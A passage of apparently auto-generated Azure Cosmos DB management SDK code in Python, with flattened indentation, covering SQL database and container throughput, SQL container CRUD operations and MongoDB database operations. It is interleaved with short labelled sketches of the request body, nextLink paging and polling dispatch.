header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(update_throughput_parameters, 'ThroughputUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_sql_database_throughput(
self, resource_group_name, account_name, database_name, resource, custom_headers=None, raw=False, polling=True, **operation_config):
"""Update the RUs per second of an Azure Cosmos DB SQL database.

:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param resource: The standard JSON format of a resource throughput
:type resource: ~azure.mgmt.cosmosdb.models.ThroughputResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: if True, the poller returns ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for a custom polling strategy
:return: An instance of LROPoller that returns Throughput or
ClientRawResponse<Throughput> if raw==True
:rtype:
~msrest.polling.LROPoller[~azure.mgmt.cosmosdb.models.Throughput]
or
~msrest.polling.LROPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.Throughput]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_sql_database_throughput_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
resource=resource,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_sql_database_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}/settings/throughput'}
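# Hedged sketch of the request body that _update_sql_database_throughput_initial
# serializes from ThroughputUpdateParameters(resource=...). The exact wire shape
# is an assumption based on the ARM convention of nesting the model under
# 'properties'; consult the serialized ThroughputUpdateParameters for the
# authoritative format.

```python
import json

# A ThroughputResource carries the RUs-per-second value; 400 is a placeholder.
resource = {'throughput': 400}

# Assumed PUT body for .../settings/throughput (nested under 'properties').
body = {'properties': {'resource': resource}}
payload = json.dumps(body)
```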
def list_sql_containers(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
"""Lists the SQL containers under an existing Azure Cosmos DB database
account.

:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator-like instance of SqlContainer
:rtype:
~azure.mgmt.cosmosdb.models.SqlContainerPaged[~azure.mgmt.cosmosdb.models.SqlContainer]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_sql_containers.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.SqlContainerPaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_sql_containers.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}/containers'}
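# Minimal sketch of the nextLink paging loop that SqlContainerPaged drives via
# internal_paging above: fetch a page, yield its items, then follow 'nextLink'
# until it is absent. The fake pages below are placeholders for illustration.

```python
def iterate_pages(fetch_page):
    # fetch_page(next_link) returns a page dict; next_link is None for page 1.
    next_link = None
    while True:
        page = fetch_page(next_link)
        for item in page['value']:
            yield item
        next_link = page.get('nextLink')
        if not next_link:
            break

# Two fake pages keyed by their link, standing in for HTTP responses.
_pages = {
    None: {'value': ['c1', 'c2'], 'nextLink': 'page2'},
    'page2': {'value': ['c3']},
}
containers = list(iterate_pages(lambda link: _pages[link]))
```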
def get_sql_container(
self, resource_group_name, account_name, database_name, container_name, custom_headers=None, raw=False, **operation_config):
"""Gets the SQL container under an existing Azure Cosmos DB database
account.

:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param container_name: Cosmos DB container name.
:type container_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: SqlContainer or ClientRawResponse if raw=True
:rtype: ~azure.mgmt.cosmosdb.models.SqlContainer or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_sql_container.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'containerName': self._serialize.url("container_name", container_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SqlContainer', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_sql_container.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}/containers/{containerName}'}
def _create_update_sql_container_initial(
self, resource_group_name, account_name, database_name, container_name, resource, options, custom_headers=None, raw=False, **operation_config):
create_update_sql_container_parameters = models.SqlContainerCreateUpdateParameters(resource=resource, options=options)
# Construct URL
url = self.create_update_sql_container.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'containerName': self._serialize.url("container_name", container_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(create_update_sql_container_parameters, 'SqlContainerCreateUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SqlContainer', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_update_sql_container(
self, resource_group_name, account_name, database_name, container_name, resource, options, custom_headers=None, raw=False, polling=True, **operation_config):
"""Create or update an Azure Cosmos DB SQL container.

:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param container_name: Cosmos DB container name.
:type container_name: str
:param resource: The standard JSON format of a container
:type resource: ~azure.mgmt.cosmosdb.models.SqlContainerResource
:param options: A key-value pair of options to be applied for the
request. This corresponds to the headers sent with the request.
:type options: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: if True, the poller returns ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for a custom polling strategy
:return: An instance of LROPoller that returns SqlContainer or
ClientRawResponse<SqlContainer> if raw==True
:rtype:
~msrest.polling.LROPoller[~azure.mgmt.cosmosdb.models.SqlContainer]
or
~msrest.polling.LROPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.SqlContainer]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_update_sql_container_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
container_name=container_name,
resource=resource,
options=options,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('SqlContainer', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_update_sql_container.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}/containers/{containerName}'}
def _delete_sql_container_initial(
self, resource_group_name, account_name, database_name, container_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete_sql_container.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'containerName': self._serialize.url("container_name", container_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete_sql_container(
self, resource_group_name, account_name, database_name, container_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes an existing Azure Cosmos DB SQL container.

:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param container_name: Cosmos DB container name.
:type container_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: if True, the poller returns ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for a custom polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrest.polling.LROPoller[None] or
~msrest.polling.LROPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_sql_container_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
container_name=container_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete_sql_container.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}/containers/{containerName}'}
def get_sql_container_throughput(
self, resource_group_name, account_name, database_name, container_name, custom_headers=None, raw=False, **operation_config):
"""Gets the RUs per second of the SQL container under an existing Azure
Cosmos DB database account.

:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param container_name: Cosmos DB container name.
:type container_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Throughput or ClientRawResponse if raw=True
:rtype: ~azure.mgmt.cosmosdb.models.Throughput or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_sql_container_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'containerName': self._serialize.url("container_name", container_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_sql_container_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}/containers/{containerName}/settings/throughput'}
def _update_sql_container_throughput_initial(
self, resource_group_name, account_name, database_name, container_name, resource, custom_headers=None, raw=False, **operation_config):
update_throughput_parameters = models.ThroughputUpdateParameters(resource=resource)
# Construct URL
url = self.update_sql_container_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'containerName': self._serialize.url("container_name", container_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(update_throughput_parameters, 'ThroughputUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_sql_container_throughput(
self, resource_group_name, account_name, database_name, container_name, resource, custom_headers=None, raw=False, polling=True, **operation_config):
"""Update the RUs per second of an Azure Cosmos DB SQL container.

:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param container_name: Cosmos DB container name.
:type container_name: str
:param resource: The standard JSON format of a resource throughput
:type resource: ~azure.mgmt.cosmosdb.models.ThroughputResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: if True, the poller returns ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for a custom polling strategy
:return: An instance of LROPoller that returns Throughput or
ClientRawResponse<Throughput> if raw==True
:rtype:
~msrest.polling.LROPoller[~azure.mgmt.cosmosdb.models.Throughput]
or
~msrest.polling.LROPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.Throughput]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_sql_container_throughput_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
container_name=container_name,
resource=resource,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_sql_container_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}/containers/{containerName}/settings/throughput'}
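The three-way `polling` dispatch above (True for the default ARM poller, False for no polling, anything else treated as a caller-supplied strategy) can be sketched with stand-in classes. `FakeArmPolling`, `FakeNoPolling`, and `select_polling_method` below are hypothetical names for illustration only, not part of msrestazure.

```python
class FakeArmPolling:
    """Stand-in for msrestazure's ARMPolling: holds the retry delay."""
    def __init__(self, delay):
        self.delay = delay


class FakeNoPolling:
    """Stand-in for NoPolling: the initial response is returned as-is."""


def select_polling_method(polling, lro_delay):
    """Mirror the dispatch used by the long-running operations above."""
    if polling is True:
        return FakeArmPolling(lro_delay)
    if polling is False:
        return FakeNoPolling()
    return polling  # caller supplied a custom polling strategy object
```

Passing any object other than True/False hands full control of the poll loop to the caller, which is why the generated code does no type checking on the final branch.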
def list_mongo_db_databases(
self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
"""Lists the MongoDB databases under an existing Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of MongoDBDatabase
:rtype:
~azure.mgmt.cosmosdb.models.MongoDBDatabasePaged[~azure.mgmt.cosmosdb.models.MongoDBDatabase]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_mongo_db_databases.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.MongoDBDatabasePaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_mongo_db_databases.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases'}
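The `prepare_request`/`internal_paging` pair above implements continuation-link paging: the first request is built from the operation's URL template, and each later request simply follows the `next_link` the service returned. A minimal self-contained sketch of that loop, using a fake in-memory page table instead of HTTP responses (`FAKE_PAGES` and `iterate_pages` are assumptions for illustration):

```python
# Maps a continuation token to (items_on_page, next_token); None keys off
# the first page, and a None next_token means the listing is exhausted.
FAKE_PAGES = {
    None: (["db1", "db2"], "page2"),
    "page2": (["db3"], None),
}


def iterate_pages(pages):
    """Yield every item, following next_link until it is exhausted."""
    next_link = None
    while True:
        items, next_link = pages[next_link]
        for item in items:
            yield item
        if next_link is None:
            break
```

The real `MongoDBDatabasePaged` iterator does the same walk lazily, deserializing each HTTP response into model objects as the caller advances.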
def get_mongo_db_database(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
"""Gets the MongoDB databases under an existing Azure Cosmos DB database
account with the provided name.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: MongoDBDatabase or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.MongoDBDatabase or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_mongo_db_database.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('MongoDBDatabase', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_mongo_db_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}'}
def _create_update_mongo_db_database_initial(
self, resource_group_name, account_name, database_name, resource, options, custom_headers=None, raw=False, **operation_config):
create_update_mongo_db_database_parameters = models.MongoDBDatabaseCreateUpdateParameters(resource=resource, options=options)
# Construct URL
url = self.create_update_mongo_db_database.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(create_update_mongo_db_database_parameters, 'MongoDBDatabaseCreateUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('MongoDBDatabase', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_update_mongo_db_database(
self, resource_group_name, account_name, database_name, resource, options, custom_headers=None, raw=False, polling=True, **operation_config):
"""Create or updates Azure Cosmos DB MongoDB database.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param resource: The standard JSON format of a MongoDB database
:type resource: ~azure.mgmt.cosmosdb.models.MongoDBDatabaseResource
:param options: A key-value pair of options to be applied for the
request. This corresponds to the headers sent with the request.
:type options: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns MongoDBDatabase or
ClientRawResponse<MongoDBDatabase> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.MongoDBDatabase]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.MongoDBDatabase]]
